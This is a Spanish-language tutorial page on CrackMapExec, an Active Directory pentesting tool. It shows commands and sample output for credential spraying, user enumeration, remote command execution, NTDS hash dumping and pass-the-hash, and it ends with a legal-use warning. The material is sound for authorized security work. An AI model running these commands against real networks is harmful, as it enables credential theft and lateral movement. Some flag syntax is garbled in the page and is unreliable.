CrackMapExec
🖥️ CrackMapExec (CME): Swiss Army Knife para Redes Windows
CrackMapExec es una herramienta de pentesting diseñada para evaluar y explotar redes Active Directory. Su principal objetivo es automatizar tareas como la enumeración de usuarios, validación de credenciales y ejecución remota de comandos en sistemas Windows.
🕵️♂️ ¿Qué puede hacer CME?
🔐 Validación de Credenciales: Probar credenciales en múltiples sistemas.
🧑💻 Enumeración de Usuarios: Identificar usuarios en un dominio.
🖥️ Ejecución Remota de Comandos: Ejecutar comandos en hosts remotos.
📂 Acceso a Recursos Compartidos: Listar y extraer archivos compartidos en SMB.
📜 Extracción de Hashes: Obtener hashes NTLM para posteriores ataques.
🚀 Instalación
Para instalar CrackMapExec:
Usar pipx (recomendado):
pipx install crackmapexec
Desde código fuente:
git clone <https://github.com/Porchetta-Industries/CrackMapExec> cd CrackMapExec pip install .
📌 Ejemplos Prácticos con Código
1️⃣ Enumerar Recursos SMB
Lista los recursos compartidos en un host.
cme smb 192.168.1.10
✅ Salida esperada:
SMB 192.168.1.10 445 DC01 [*] Windows Server 2019 Standard 1809
SMB 192.168.1.10 445 DC01 [+] Enumerated shares
SMB 192.168.1.10 445 DC01 SHARE: SharedDocs
SMB 192.168.1.10 445 DC01 IPC$: Remote IPC
2️⃣ Probar Credenciales
Verifica si un conjunto de credenciales es válido.
cme smb 192.168.1.0/24 -u admin -p password123
✅ Explicación:
192.168.1.0/24
: Escanea toda la subred.u
: Usuario.p
: Contraseña.
✅ Salida esperada:
SMB 192.168.1.10 445 DC01 [+] admin:password123 (Valid Credentials)
3️⃣ Obtener Usuarios y Grupos 🧑💻
Enumera usuarios y grupos del dominio.
cme smb 192.168.1.10 -u admin -p password123 --users
✅ Salida esperada:
SMB 192.168.1.10 445 DC01 [*] Enumerated Users
SMB 192.168.1.10 445 DC01 Administrator
SMB 192.168.1.10 445 DC01 Guest
SMB 192.168.1.10 445 DC01 User1
4️⃣ Ejecución Remota de Comandos 💻
Ejecuta comandos en un sistema remoto.
cme smb 192.168.1.10 -u admin -p password123 -x "ipconfig"
✅ Salida esperada:
SMB 192.168.1.10 445 DC01 [+] Executed command
SMB 192.168.1.10 445 DC01 [Command Output] Windows IP Configuration...
5️⃣ Dump de Hashes NTLM 🔐
Extrae hashes NTLM de un sistema Windows.
cme smb 192.168.1.10 -u admin -p password123 --ntds
✅ Salida esperada:
SMB 192.168.1.10 445 DC01 [+] Dumping NTDS
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
6️⃣ Ataques Pass-the-Hash
Utiliza hashes NTLM en lugar de contraseñas.
cme smb 192.168.1.10 -u admin -H 8846f7eaee8fb117ad06bdd830b7586c
✅ Explicación:
H
: Especifica un hash NTLM en lugar de una contraseña.
⚙️ Opciones Útiles
Ejecutar scripts personalizados: Usa
-exec-method <method>
para cambiar la técnica de ejecución.Modo silencioso: Filtra salidas para reducir ruido con
-quiet
.Guardar resultados: Exporta a un archivo:
cme smb 192.168.1.10 -u admin -p password123 -o output.txt
🌟 Mejores Prácticas
Combinación con herramientas: Usa CME junto con herramientas como BloodHound para un análisis profundo de Active Directory.
Pruebas éticas: Asegúrate de tener permiso para realizar estas auditorías.
Protocolo seguro: Usa siempre SMB v2 o v3 para evitar vulnerabilidades en SMB v1.
🚨 Advertencia
El uso de CrackMapExec en sistemas sin autorización puede tener consecuencias legales graves. Úsalo exclusivamente para auditorías con permiso.
🤓 Conclusión
CrackMapExec es una herramienta increíblemente versátil que agiliza el trabajo de pentesters en redes basadas en Windows. Su capacidad para manejar múltiples tareas en una sola herramienta la convierte en imprescindible. 🔐
Última actualización
¿Te fue útil?